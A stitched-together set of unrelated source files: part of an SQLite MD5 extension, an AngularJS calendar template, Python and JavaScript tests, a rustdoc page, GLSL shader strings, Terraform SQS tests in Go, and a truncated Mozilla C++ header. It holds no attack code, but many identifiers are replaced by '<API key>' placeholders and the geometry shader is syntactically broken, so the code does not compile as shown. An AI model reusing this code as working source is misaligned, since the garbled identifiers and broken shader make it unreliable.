      // MD5Update(p, (unsigned char*)zData, strlen(zData));
      MD5Update(p, (unsigned char*)zData, sqlite3_value_bytes(argv[i]));
    }
  }
}
/* xFinal for group_md5(): finish the running context started by md5step
** and return the 16-byte digest as a blob. */
static void md5finalize(sqlite3_context *context){
  MD5Context *p;
  unsigned char digest[16];
  p = <API key>(context, sizeof(*p));
  MD5Final(digest,p);
  sqlite3_result_blob(context, digest, sizeof(digest), SQLITE_TRANSIENT);
}
/*
** Scalar md5(X, ...): returns the 16-byte MD5 digest of the
** concatenation of all non-NULL argument blobs. Returns NULL when the
** first argument is NULL; returns nothing when called with no args.
*/
static void md5(sqlite3_context *context, int argc, sqlite3_value **argv){
  MD5Context ctx;
  unsigned char digest[16];
  int idx;

  if( argc<1 ) return;
  if( sqlite3_value_type(argv[0])==SQLITE_NULL ){
    sqlite3_result_null(context);
    return;
  }
  MD5Init(&ctx);
  for(idx=0; idx<argc; idx++){
    const unsigned char *pData = (const unsigned char*)sqlite3_value_blob(argv[idx]);
    if( pData==0 ) continue;
    /* Hash the blob's full byte length, including embedded NULs. */
    MD5Update(&ctx, pData, sqlite3_value_bytes(argv[idx]));
  }
  MD5Final(digest, &ctx);
  sqlite3_result_blob(context, digest, sizeof(digest), SQLITE_TRANSIENT);
}
/*
** A command to take the md5 hash of a file. The argument is the
** name of the file. Returns NULL when the argument is NULL or the
** file cannot be opened for reading.
*/
static void md5file(sqlite3_context *context, int argc, sqlite3_value **argv){
  FILE *in;
  MD5Context ctx;
  unsigned char digest[16];
  char zBuf[10240];

  if( sqlite3_value_type(argv[0]) == SQLITE_NULL ){
    /* file name not defined */
    sqlite3_result_null(context);
    return;
  }
  /* BUG FIX: sqlite3_value_text() returns const unsigned char*, while
  ** fopen() expects const char*. The original cast to (unsigned char *)
  ** was a constraint violation (and a hard error under C++). */
  in = fopen((const char *)sqlite3_value_text(argv[0]), "rb");
  if( in==0 ){
    /* unable to open file for reading */
    sqlite3_result_null(context);
    return;
  }
  MD5Init(&ctx);
  /* Stream the file through the hash in fixed-size chunks. */
  for(;;){
    int n;
    n = (int)fread(zBuf, 1, sizeof(zBuf), in);
    if( n<=0 ) break;
    MD5Update(&ctx, (unsigned char*)zBuf, (unsigned)n);
  }
  fclose(in);
  MD5Final(digest, &ctx);
  sqlite3_result_blob(context, digest, sizeof(digest), SQLITE_TRANSIENT);
}
/* SQLite invokes this routine once when it loads the extension.
** Create new functions, collating sequences, and virtual table
** modules here. This is usually the only exported symbol in
** the shared library.
**
** Registers: group_md5 (aggregate, any arity), md5 (scalar, any
** arity), md5file (scalar, exactly 1 argument).
*/
int sqlite3Md5Init(sqlite3 *db){
  <API key>(db, "group_md5", -1, SQLITE_UTF8, 0, 0, md5step, md5finalize);
  <API key>(db, "md5", -1, SQLITE_UTF8, 0, md5, 0, 0);
  <API key>(db, "md5file", 1, SQLITE_UTF8, 0, md5file, 0, 0);
  /* NOTE(review): registration return codes are ignored; surfacing the
  ** first non-OK code would aid debugging — confirm desired behavior. */
  return 0;
}
#if !SQLITE_CORE
/* Entry point invoked by sqlite3_load_extension() when this code is
** built as a loadable shared library rather than into SQLite core. */
int <API key>(
  sqlite3 *db,
  char **pzErrMsg,
  const <API key> *pApi
){
  <API key>(pApi)
  return sqlite3Md5Init(db);
}
#endif
#endif
/* Registers the extension's init routine to run automatically for every
** new database connection in this process. */
int auto_extension() {
  return <API key>( (void(*)(void))<API key> );
}
<!--<md-content layout='column' layout-fill md-swipe-left='next()' md-swipe-right='prev()'>-->
<md-content layout='column' layout-fill>
<md-toolbar class="md-accent">
<div class='md-toolbar-tools' layout='row'>
<md-button class="md-icon-button" ng-click='prev()' aria-label="Previous month">
<md-tooltip ng-if="::tooltips()">Previous month</md-tooltip>
<md-icon md-font-icon="icon-chevron-right" ></md-icon>
</md-button>
<div flex></div>
<h2 class='calendar-md-title'><span>{{ calendar.start | date:titleFormat:timezone }}</span></h2>
<div flex></div>
<md-button class="md-icon-button" ng-click='next()' aria-label="Next month">
<md-tooltip ng-if="::tooltips()">Next month</md-tooltip>
<md-icon md-font-icon="icon-chevron-left" class="moveNext"></md-icon>
</md-button>
</div>
</md-toolbar>
<!-- agenda view -->
<md-content ng-if='weekLayout === columnWeekLayout' class='agenda'>
<div ng-repeat='week in calendar.weeks track by $index'>
<div ng-if="sameMonth(day)" ng-class='{"disabled" : isDisabled(day), active: active === day, "has-events": hasEvents(day) }' ng-repeat='day in week' layout>
<md-tooltip ng-if="::tooltips()">{{ day | date:dayTooltipFormat:timezone }}</md-tooltip>
<div>{{ day | date:dayFormat:timezone }}</div>
<div flex compile='dataService.data[dayKey(day)]'></div>
</div>
</div>
</md-content>
<!-- calendar view -->
<md-content ng-if='weekLayout !== columnWeekLayout' flex layout="column" class='calendar'>
<div layout='row' class='subheader'>
<div layout-padding class='subheader-day' flex ng-repeat='day in calendar.weeks[0]'>
<md-tooltip ng-if="::tooltips()">{{ day | date:<API key> }}</md-tooltip>
{{ day | date:dayLabelFormat }}
</div>
</div>
<div ng-if='week.length' ng-repeat='week in calendar.weeks track by $index' flex layout='row'>
<div tabindex='{{ sameMonth(day) ? (day | date:dayFormat:timezone) : 0 }}' ng-repeat='day in week track by $index' flex layout layout-padding ng-class='{"disabled" : isDisabled(day), "active": isActive(day), "has-events": hasEvents(day), "md-whiteframe-12dp": hover || focus }' >
<md-tooltip ng-if="::tooltips()">{{ day | date:dayTooltipFormat }}</md-tooltip>
<div>{{ day | date:dayFormat }}</div>
<div flex compile='dataService.data[dayKey(day)]' id='{{ day | date:dayIdFormat }}'></div>
</div>
</div>
</md-content>
</md-content> |
from elasticsearch_dsl import query
from kuma.core.tests import eq_, ok_
from kuma.wiki.search import WikiDocumentType
from . import ElasticTestCase
class <API key>(ElasticTestCase):
    """Search tests for ``WikiDocumentType`` run against the documents
    loaded from the wiki fixtures.

    Each test calls ``self.refresh()`` first so that freshly indexed
    documents are visible to the queries.
    """

    fixtures = ElasticTestCase.fixtures + ['wiki/documents.json']

    def <API key>(self):
        # Excerpts for a content match contain the matched term but no
        # highlighting markup such as <strong>.
        self.refresh()
        results = WikiDocumentType.search().query('match', content='audio')
        ok_(results.count() > 0)
        for doc in results.execute():
            excerpt = doc.get_excerpt()
            ok_('audio' in excerpt)
            ok_('<strong>' not in excerpt)

    def <API key>(self):
        # A title-OR-content match combined with a locale term filter
        # returns only en-US documents.
        self.refresh()
        results = (WikiDocumentType.search()
                   .query(query.Match(title='article') |
                          query.Match(content='article'))
                   .filter('term', locale='en-US'))
        for doc in results.execute():
            eq_('en-US', doc.locale)

    def <API key>(self):
        # The excerpt comes from the matched content, not from unrelated
        # extra content in the document.
        self.refresh()
        results = WikiDocumentType.search().query('match', content='audio')
        ok_(results.count() > 0)
        for doc in results.execute():
            excerpt = doc.get_excerpt()
            ok_('the word for tough things' in excerpt)
            ok_('extra content' not in excerpt)

    def <API key>(self):
        # User profile pages are excluded from the indexable queryset.
        self.refresh()
        title_list = WikiDocumentType.get_indexable().values_list('title',
                                                                  flat=True)
        ok_('User:jezdez' not in title_list)
/* vim: set ft=javascript ts=2 et sw=2 tw=80: */
"use strict";

// Tests that the rule view strict search filter works properly for stylesheet
// source.

// Backtick-quoted query: requests a strict (exact) match on the
// stylesheet source "doc_urls_clickable.css:1".
const SEARCH = "`doc_urls_clickable.css:1`";
const TEST_URI = URL_ROOT + "doc_urls_clickable.html";

add_task(function* () {
  yield addTab(TEST_URI);
  let {inspector, view} = yield openRuleView();
  yield selectNode(".relative1", inspector);
  yield testAddTextInFilter(inspector, view);
});

// Applies SEARCH to the rule view filter, then verifies which rules
// remain visible and that the matching stylesheet source is highlighted.
function* testAddTextInFilter(inspector, view) {
  yield setSearchFilter(view, SEARCH);

  info("Check that the correct rules are visible");
  is(view.element.children.length, 2, "Should have 2 rules.");
  is(<API key>(view, 0).rule.selectorText, "element",
    "First rule is inline element.");

  let rule = <API key>(view, 1).rule;
  let source = rule.textProps[0].editor.ruleEditor.source;
  is(rule.selectorText, ".relative1", "Second rule is .relative1.");
  ok(source.classList.contains("ruleview-highlight"),
    "stylesheet source is correctly highlighted.");
}
package org.miloss.fgsms.plugins.sla.alertservice; |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `is_loaded` fn in crate `gleam`.">
<meta name="keywords" content="rust, rustlang, rust-lang, is_loaded">
<title>gleam::ffi::DrawArrays::is_loaded - Rust</title>
<link rel="stylesheet" type="text/css" href="../../../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
<![endif]-->
<section class="sidebar">
<p class='location'><a href='../../index.html'>gleam</a>::<wbr><a href='../index.html'>ffi</a>::<wbr><a href='index.html'>DrawArrays</a></p><script>window.sidebarCurrent = {name: 'is_loaded', ty: 'fn', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</section>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content fn">
<h1 class='fqn'><span class='in-band'>Function <a href='../../index.html'>gleam</a>::<wbr><a href='../index.html'>ffi</a>::<wbr><a href='index.html'>DrawArrays</a>::<wbr><a class='fn' href=''>is_loaded</a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-34898' class='srclink' href='../../../src/gleam///home/servo/buildbot/slave/doc/build/target/debug/build/<API key>/out/gl_bindings.rs.html#9804-9806' title='goto source code'>[src]</a></span></h1>
<pre class='rust fn'>pub fn is_loaded() -> <a href='../../../std/primitive.bool.html'>bool</a></pre></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<div id="help" class="hidden">
<div>
<div class="shortcuts">
<h1>Keyboard Shortcuts</h1>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
</dl>
</div>
<div class="infos">
<h1>Search Tricks</h1>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code>)
</p>
</div>
</div>
</div>
<script>
window.rootPath = "../../../";
window.currentCrate = "gleam";
window.playgroundUrl = "";
</script>
<script src="../../../jquery.js"></script>
<script src="../../../main.js"></script>
<script async src="../../../search-index.js"></script>
</body>
</html> |
#include "shaders.h"
namespace Yuni
{
namespace Gfx3D
{

	//////////// VERTEX SHADERS

	// Minimal vertex shader : only transform the vertex coordinates
	const char* const vsTransform =
	R"(
#version 130
in vec3 attrVertex;
// Minimal vertex shader : only transform the vertex coordinates
void main()
{
gl_Position = <API key> * vec4(attrVertex, 1.0f);
}
)";

	// Very simple vertex shader : transform coordinates and propagate texture coordinates
	const char* const vsTexCoord =
	R"(
#version 130
in vec3 attrVertex;
in vec2 attrTexCoord;
out vec2 texCoord;
// Very simple vertex shader : transform coordinates and propagate texture coordinates
void main()
{
gl_Position = <API key> * vec4(attrVertex, 1.0f);
texCoord = attrTexCoord;
}
)";

	// For 2D post shaders, texture coordinates are calculated by transforming vertex position
	// from [-1,1] to [0,1]
	const char* const vs2D =
	R"(
#version 130
in vec2 attrVertex;
out vec2 texCoord;
// For 2D post shaders, texture coordinates are calculated by transforming vertex position
// from [-1,1] to [0,1]
void main()
{
gl_Position = vec4(attrVertex, 0.0f, 1.0f);
texCoord = (attrVertex + 1.0) / 2.0;
}
)";

	// Pass the color as attribute
	const char* const vsColorAttr =
	R"(
#version 130
in vec3 attrVertex;
in vec4 attrColor;
out vec4 color;
// Pass the color as attribute
void main()
{
color = attrColor;
gl_Position = <API key> * vec4(attrVertex, 1.0f);
}
)";

	// Sample a texture using a rectangle, do not resize the image, fill empty parts with a color
	// NOTE(review): `out bool hasBlank` is assigned a float ternary
	// (1.0f/0.0f) below, and the sibling vsImageRect uses `out float`
	// for the same purpose — this declaration looks like it should be
	// `out float`; confirm against the GLSL compiler in use.
	const char* const vsImageRectWithGeom =
	R"(
#version 130
in vec3 attrVertex;
in vec2 attrTexCoord;
out vec2 texCoord;
out bool hasBlank; // The rect leaves some blank on the borders
uniform vec4 Bounds; // Stored as (xMin, yMin, xMax, yMax)
// Use a rectangle overlay over a texture, store which parts of the overlay are out of bounds
void main()
{
texCoord = attrTexCoord;
vec4 vertex = vec4(attrVertex, 1.0f);
hasBlank = (vertex.x < Bounds.x || vertex.x > Bounds.z || vertex.y < Bounds.y || vertex.y > Bounds.w) ? 1.0f : 0.0f;
gl_Position = <API key> * vertex;
}
)";

	// Same overlay logic as above, but flags out-of-bounds vertices via
	// a float `isEmpty` consumed directly by the fragment shader.
	const char* const vsImageRect =
	R"(
#version 130
in vec3 attrVertex;
in vec2 attrTexCoord;
out vec2 texCoord;
out float isEmpty; // Used as a boolean (0 = false, 1 = true)
uniform vec4 Bounds; // Stored as (xMin, yMin, xMax, yMax)
// Use a rectangle overlay over a texture, store which parts of the overlay are out of bounds
void main()
{
texCoord = attrTexCoord;
vec4 vertex = vec4(attrVertex, 1.0f);
isEmpty = (vertex.x < Bounds.x || vertex.x > Bounds.z || vertex.y < Bounds.y || vertex.y > Bounds.w) ? 1.0f : 0.0f;
gl_Position = <API key> * vertex;
}
)";

	// Phong shading
	const char* const vsPhong =
	R"(
#version 130
const uint MAX_LIGHTS = 4u;
in vec3 attrVertex;
in vec3 attrNormal;
in vec2 attrTexCoord;
out vec3 vertex;
out vec3 normal;
out vec2 texCoord;
uniform uint LightCount;
uniform vec4 LightPosition[MAX_LIGHTS];
const vec3 pos = vec3(-0.5, 0.5, 0.0);
// Vertex shader for Phong shading with several lights
void main(void)
{
vertex = vec3(gl_ModelViewMatrix * vec4(attrVertex, 1));
normal = normalize(gl_NormalMatrix * attrNormal);
texCoord = attrTexCoord;
// for (uint i = 0u; i < LightCount; ++i)
// vec3 lightPos = vec3(gl_ModelViewMatrix * LightPosition[i]);
// // Directional
// lightDir[i] = normalize(-lightPos);
// // Omni / Point
// // lightDir[i] = normalize(lightPos - vertex);
//lightDir0 = normalize(vec3(gl_ModelViewMatrix * vec4(pos, 0.0)));
gl_Position = <API key> * vec4(attrVertex, 1.0f);
}
)";

	// Skybox vertex shader: a cubemap is sampled with the (normalized)
	// vertex position as 3D texture coordinates.
	const char* const vsCubeMap =
	R"(
#version 130
in vec3 attrVertex;
out vec3 texCoord;
// 3D texture coordinates for a cubemap are actually the vertex' position
void main()
{
gl_Position = <API key> * vec4(attrVertex, 1.0f);
texCoord = normalize(attrVertex);
}
)";


	//////////// FRAGMENT SHADERS
	// NOTE(review): these shaders declare `out vec4 gl_FragColor`
	// explicitly; gl_FragColor is a built-in in GLSL 130 — confirm the
	// target drivers accept the redeclaration.

	// Use a single color given as uniform
	const char* const fsColorUniform =
	R"(
#version 130
out vec4 gl_FragColor;
uniform vec4 Color;
// Use a single color given as uniform
void main()
{
gl_FragColor = Color;
}
)";

	// Use a single color given as attribute
	const char* const fsColorAttr =
	R"(
#version 130
in vec4 color;
out vec4 gl_FragColor;
// Use color passed as an attribute
void main()
{
gl_FragColor = color;
}
)";

	// Use directly the texture value, no lighting
	const char* const fsSimpleTexture =
	R"(
#version 130
in vec2 texCoord;
out vec4 gl_FragColor;
uniform sampler2D Texture0;
// Use directly the texture value, no lighting
void main()
{
gl_FragColor = texture(Texture0, texCoord);
}
)";

	// Sample a texture using a rectangle, do not resize the image, fill empty parts with a color
	const char* const fsImageRect =
	R"(
#version 130
in vec2 texCoord;
in float isEmpty; // Used as a boolean (0 = false, 1 = true)
out vec4 gl_FragColor;
uniform sampler2D Texture0;
uniform vec4 FillColor = vec4(0.0f, 0.0f, 0.0f, 0.0f); // Full transparent
uniform float Opacity = 1.0f; // Opaque
void main()
{
// Sample the texture
vec4 texColor = texture(Texture0, texCoord);
// Multiply by the given opacity
texColor = vec4(texColor.rgb, texColor.a * Opacity);
// Take either the texture color or the fill color depending on if we are out of bounds
gl_FragColor = mix(texColor, FillColor, isEmpty);
}
)";

	// Freetype with normal render mode generates alpha-only bitmaps, stored as GL_R textures
	// This shader displays them with the proper color.
	const char* const fsText =
	R"(
#version 130
in vec2 texCoord;
out vec4 gl_FragColor;
uniform sampler2D Texture0;
uniform sampler2D Texture1;
uniform vec4 TextColor = vec4(1.0f, 1.0f, 1.0f, 1.0f);
uniform vec4 BackColor = vec4(0.0f, 0.0f, 0.0f, 1.0f); // Black
uniform float HasBGColor = 0.0f;
// Freetype with normal render mode generates alpha-only bitmaps, stored as GL_R textures
// This shader displays them with the proper color.
void main(void)
{
vec4 alpha = texture(Texture0, texCoord);
//vec4 material = texture(Texture1, texCoord);
vec4 withBGColor = mix(BackColor, TextColor, alpha.r);
vec4 withoutBGColor = vec4(TextColor.r, TextColor.g, TextColor.b, TextColor.a * alpha.r);
gl_FragColor = mix(withoutBGColor, withBGColor, HasBGColor);
}
)";

	// Color picking: encodes a 32-bit object ID into the RGBA output,
	// one byte per channel, most significant byte in red.
	// NOTE(review): `& 0xff` mixes int with uint ObjectID — strict GLSL
	// compilers may require `0xffu`; confirm on the target driver.
	const char* const fsPicking =
	R"(
#version 410
out vec4 gl_FragColor;
// uint is 32-bit
uniform uint ObjectID = 0u;
// Color picking
void main()
{
float highest = (ObjectID >> 24u) / 255.0f;
float high = ((ObjectID >> 16u) & 0xff) / 255.0f;
float low = ((ObjectID >> 8u) & 0xff) / 255.0f;
float lowest = (ObjectID & 0xff) / 255.0f;
gl_FragColor = vec4(highest, high, low, lowest);
}
)";

	// Skybox : cube map sampling
	const char* const fsSkybox =
	R"(
#version 130
in vec3 texCoord;
out vec4 gl_FragColor;
uniform samplerCube Texture0;
// Cube map access
void main()
{
gl_FragColor = texture(Texture0, texCoord);
}
)";

	// Phong shading
	const char* const fsPhong =
	R"(
#version 130
const uint MAX_LIGHTS = 4u;
in vec3 vertex;
in vec3 normal;
in vec2 texCoord;
out vec4 gl_FragColor;
uniform sampler2D Texture0;
uniform sampler2D Texture1;
uniform sampler2D Texture2;
uniform uint LightCount;
uniform vec4 LightPosition[MAX_LIGHTS];
uniform vec4 LightDiffuse[MAX_LIGHTS];
uniform vec4 LightAmbient[MAX_LIGHTS];
uniform vec4 LightSpecular[MAX_LIGHTS];
uniform vec4 MaterialDiffuse = vec4(1.0f, 0.0f, 0.0f, 0.0f);
uniform vec4 MaterialAmbient = vec4(1.0f, 1.0f, 1.0f, 1.0f);
uniform vec4 MaterialSpecular = vec4(1.0f, 1.0f, 1.0f, 1.0f);
uniform vec4 MaterialEmission = vec4(0.0f, 0.0f, 0.0f, 1.0f);
uniform float MaterialShininess;
// Phong shading with several lights
void main()
{
vec3 eye = normalize(-vertex); // we are in Eye Coordinates, so EyePos is (0,0,0)
vec4 texColor = vec4(texture2D(Texture0, texCoord).rgb, 1.0);
vec4 matColor = vec4(0, 0, 0, 0);
for (uint i = 0u; i < LightCount && i < MAX_LIGHTS; ++i)
{
vec3 L = normalize(vec3(gl_ModelViewMatrix * vec4(LightPosition[i].xyz, 0.0f)));
vec3 R = normalize(-reflect(L, normal));
// calculate Ambient Term:
matColor += LightAmbient[i] * MaterialAmbient;
// calculate Diffuse Term:
vec4 diff = LightDiffuse[i] * MaterialDiffuse * texColor * max(-dot(normal,L), 0.0);
diff = clamp(diff, 0.0, 1.0);
matColor += diff;
// calculate Specular Term:
//vec4 spec = LightSpecular[i] * MaterialSpecular * pow(max(dot(R, eye), 0.0), 0.3 * MaterialShininess);
vec4 spec = LightSpecular[i] * MaterialSpecular * max(pow(-dot(R, eye), MaterialShininess), 0.0);
spec = clamp(spec, 0.0, 1.0);
matColor += spec;
}
// write Total Color:
gl_FragColor = matColor;
}
)";

	// YCbCr -> RGB conversion for planar video frames stored in three
	// single-channel textures (Y, U, V), with row padding compensation.
	const char* const fsYuv2Rgb =
	R"(
#version 130
in vec2 texCoord;
out vec4 gl_FragColor;
uniform uint PaddedWidth = 1u;
uniform uint Width = 1u; // The only important thing here is the Width / PaddedWidth ratio
uniform sampler2D TextureY;
uniform sampler2D TextureU;
uniform sampler2D TextureV;
void main()
{
// Correct horizontal texture coordinate to account for padding
vec2 fixedCoord = vec2(texCoord.s * Width / PaddedWidth, 1.0 - texCoord.t);
// Sample the texture
float y = texture2D(TextureY, fixedCoord).r;
float cb = texture2D(TextureU, fixedCoord).r;
float cr = texture2D(TextureV, fixedCoord).r;
y = 1.1643 * (y - 0.0625);
cb = cb - 0.5;
cr = cr - 0.5;
float r = y + 1.5958 * cr;
float g = y - 0.39173 * cb - 0.81290 * cr;
float b = y + 2.017 * cb;
gl_FragColor = vec4(r, g, b, 1.0);
}
)";


	//////////// GEOMETRY SHADERS

	// Generate empty borders for image rectangles
	// NOTE(review): this shader appears unfinished/broken as written:
	//  - `max_vertices = )` is missing its count (GLSL syntax error);
	//  - `texCoord` is declared both as `in vec2 texCoord[3]` and
	//    `out vec3 texCoord[3]` (name clash);
	//  - `isEmpty = false;` assigns a bool to a float;
	//  - the second loop body (border emission) is empty.
	// Confirm intent before enabling it anywhere.
	const char* const gsImageRect =
	R"(
// Necessary version for the new geometry shader syntax
#version 150
layout(triangles) in;
layout(triangle_strip, max_vertices = ) out;
uniform vec4 Bounds; // Stored as (xMin, yMin, xMax, yMax)
in bool hasBlank[3]; // Which vertices leave blank on their side
in vec2 texCoord[3]; // Texture coordinates
out float isEmpty; // Used as a boolean (0 = false, 1 = true)
out vec3 texCoord[3];
void main()
{
vec4 vertex;
for (int i = 0; i < gl_in.length(); ++i)
{
gl_Position = gl_in[i].gl_Position;
isEmpty = false;
EmitVertex();
}
EndPrimitive();
for (int i = 0; i < gl_in.length(); ++i)
if (hasBlank[i])
{
}
}
)";


} // namespace Gfx3D
} // namespace Yuni
package aws
import (
"fmt"
"testing"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/awserr"
"github.com/aws/aws-sdk-go/service/sqs"
"github.com/hashicorp/terraform/helper/resource"
"github.com/hashicorp/terraform/terraform"
)
// TestAccAWSSQSQueue is the acceptance test for the aws_sqs_queue
// resource: it applies a queue with default attributes, then one with
// overridden attributes, checking each configuration after apply.
func TestAccAWSSQSQueue(t *testing.T) {
	resource.Test(t, resource.TestCase{
		PreCheck:     func() { testAccPreCheck(t) },
		Providers:    testAccProviders,
		CheckDestroy: <API key>,
		Steps: []resource.TestStep{
			resource.TestStep{
				Config: <API key>,
				Check: resource.<API key>(
					<API key>("aws_sqs_queue.queue-with-defaults"),
				),
			},
			resource.TestStep{
				Config: <API key>,
				Check: resource.<API key>(
					<API key>("aws_sqs_queue.<API key>"),
				),
			},
		},
	})
}
// CheckDestroy helper: verifies that every aws_sqs_queue in the final
// state has actually been deleted from AWS. Fetching attributes of a
// deleted queue must fail; success means the queue still exists.
func <API key>(s *terraform.State) error {
	conn := testAccProvider.Meta().(*AWSClient).sqsconn
	for _, rs := range s.RootModule().Resources {
		if rs.Type != "aws_sqs_queue" {
			continue
		}

		// Check if queue exists by checking for its attributes
		params := &sqs.<API key>{
			QueueURL: aws.String(rs.Primary.ID),
		}
		_, err := conn.GetQueueAttributes(params)
		if err == nil {
			return fmt.Errorf("Queue %s still exists. Failing!", rs.Primary.ID)
		}

		// Verify the error is what we want: an AWS service error
		// (e.g. queue-does-not-exist) is the expected outcome; any
		// other error type is surfaced as a test failure.
		_, ok := err.(awserr.Error)
		if !ok {
			return err
		}
	}
	return nil
}
// Returns a check that the named queue exists in state and that its
// live SQS attributes carry the documented default values.
func <API key>(n string) resource.TestCheckFunc {
	return func(s *terraform.State) error {
		rs, ok := s.RootModule().Resources[n]
		if !ok {
			return fmt.Errorf("Not found: %s", n)
		}
		// The resource ID is the queue URL.
		if rs.Primary.ID == "" {
			return fmt.Errorf("No Queue URL specified!")
		}

		conn := testAccProvider.Meta().(*AWSClient).sqsconn

		params := &sqs.<API key>{
			QueueURL:       aws.String(rs.Primary.ID),
			AttributeNames: []*string{aws.String("All")},
		}
		resp, err := conn.GetQueueAttributes(params)
		if err != nil {
			return err
		}

		// checking if attributes are defaults
		for k, v := range resp.Attributes {
			if k == "VisibilityTimeout" && *v != "30" {
				return fmt.Errorf("VisibilityTimeout (%s) was not set to 30", *v)
			}

			if k == "<API key>" && *v != "345600" {
				return fmt.Errorf("<API key> (%s) was not set to 345600", *v)
			}

			if k == "MaximumMessageSize" && *v != "262144" {
				return fmt.Errorf("MaximumMessageSize (%s) was not set to 262144", *v)
			}

			if k == "DelaySeconds" && *v != "0" {
				return fmt.Errorf("DelaySeconds (%s) was not set to 0", *v)
			}

			if k == "<API key>" && *v != "0" {
				return fmt.Errorf("<API key> (%s) was not set to 0", *v)
			}
		}

		return nil
	}
}
// Returns a TestCheckFunc that verifies the queue named n exists in AWS and
// that its attributes match the explicit overrides from the test
// configuration below (delay 90s, max size 2048 bytes, retention 86400s,
// receive wait 10s, visibility timeout 60s).
func <API key>(n string) resource.TestCheckFunc {
	return func(s *terraform.State) error {
		rs, ok := s.RootModule().Resources[n]
		if !ok {
			return fmt.Errorf("Not found: %s", n)
		}
		if rs.Primary.ID == "" {
			return fmt.Errorf("No Queue URL specified!")
		}
		conn := testAccProvider.Meta().(*AWSClient).sqsconn
		// Fetch every attribute of the queue identified by its URL
		// (stored as the resource ID in the Terraform state).
		params := &sqs.<API key>{
			QueueURL:       aws.String(rs.Primary.ID),
			AttributeNames: []*string{aws.String("All")},
		}
		resp, err := conn.GetQueueAttributes(params)
		if err != nil {
			return err
		}
		// checking if attributes match our overrides
		for k, v := range resp.Attributes {
			if k == "VisibilityTimeout" && *v != "60" {
				return fmt.Errorf("VisibilityTimeout (%s) was not set to 60", *v)
			}
			if k == "<API key>" && *v != "86400" {
				return fmt.Errorf("<API key> (%s) was not set to 86400", *v)
			}
			if k == "MaximumMessageSize" && *v != "2048" {
				return fmt.Errorf("MaximumMessageSize (%s) was not set to 2048", *v)
			}
			if k == "DelaySeconds" && *v != "90" {
				return fmt.Errorf("DelaySeconds (%s) was not set to 90", *v)
			}
			if k == "<API key>" && *v != "10" {
				return fmt.Errorf("<API key> (%s) was not set to 10", *v)
			}
		}
		return nil
	}
}
// Terraform configuration for a queue that relies entirely on the SQS
// service defaults (only the name is set); paired with the defaults-check
// function above.
const <API key> = `
resource "aws_sqs_queue" "queue-with-defaults" {
    name = "<API key>"
}
`
// Terraform configuration that overrides every tunable queue attribute;
// paired with the overrides-check function above, which asserts these
// exact values.
const <API key> = `
resource "aws_sqs_queue" "<API key>" {
    name = "<API key>"
    delay_seconds = 90
    max_message_size = 2048
    <API key> = 86400
    <API key> = 10
    <API key> = 60
}
`
/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */
#ifndef <API key>
#define <API key>
#include "mozilla/Attributes.h"
#include "nsContainerFrame.h"
#include "nsIFormControlFrame.h"
#include "<API key>.h"
#include "nsCOMPtr.h"
class nsITextControlFrame;
class nsPresContext;
namespace mozilla {
enum class <API key> : uint8_t;
class WidgetEvent;
class WidgetGUIEvent;
namespace dom {
class HTMLInputElement;
} // namespace dom
} // namespace mozilla
/**
 * This frame type is used for <input type=number>.
 *
 * It hosts anonymous content (an outer wrapper, a text field for
 * editing/displaying the value, and spin-up/spin-down buttons — see the
 * member variables at the bottom) and keeps that content in sync with the
 * owning HTMLInputElement.
 */
class <API key> final : public nsContainerFrame
                      , public <API key>
                      , public nsIFormControlFrame
{
  friend nsIFrame*
  <API key>(nsIPresShell* aPresShell, nsStyleContext* aContext);

  typedef mozilla::<API key> <API key>;
  typedef mozilla::dom::Element Element;
  typedef mozilla::dom::HTMLInputElement HTMLInputElement;
  typedef mozilla::WidgetEvent WidgetEvent;
  typedef mozilla::WidgetGUIEvent WidgetGUIEvent;

  explicit <API key>(nsStyleContext* aContext);

public:
  <API key>(<API key>)
  NS_DECL_QUERYFRAME
  <API key>

  virtual void DestroyFrom(nsIFrame* aDestructRoot) override;
  virtual void <API key>(mozilla::EventStates aStates) override;
  // The frame tree should not descend into this frame's (anonymous) content.
  virtual bool IsLeaf() const override { return true; }

#ifdef ACCESSIBILITY
  virtual mozilla::a11y::AccType AccessibleType() override;
#endif

  virtual nscoord GetMinISize(nsRenderingContext* aRenderingContext) override;
  virtual nscoord GetPrefISize(nsRenderingContext* aRenderingContext) override;

  virtual void Reflow(nsPresContext* aPresContext,
                      ReflowOutput& aDesiredSize,
                      const ReflowInput& aReflowInput,
                      nsReflowStatus& aStatus) override;

  virtual nsresult AttributeChanged(int32_t aNameSpaceID,
                                    nsIAtom* aAttribute,
                                    int32_t aModType) override;

  // <API key>
  virtual nsresult <API key>(nsTArray<ContentInfo>& aElements) override;
  virtual void <API key>(nsTArray<nsIContent*>& aElements,
                         uint32_t aFilter) override;

#ifdef DEBUG_FRAME_DUMP
  virtual nsresult GetFrameName(nsAString& aResult) const override {
    return MakeFrameName(NS_LITERAL_STRING("NumberControl"), aResult);
  }
#endif

  virtual nsIAtom* GetType() const override;

  // Behaves as a replaced element with a line participant bit cleared from
  // the queried flags before delegating to the base class.
  virtual bool IsFrameOfType(uint32_t aFlags) const override
  {
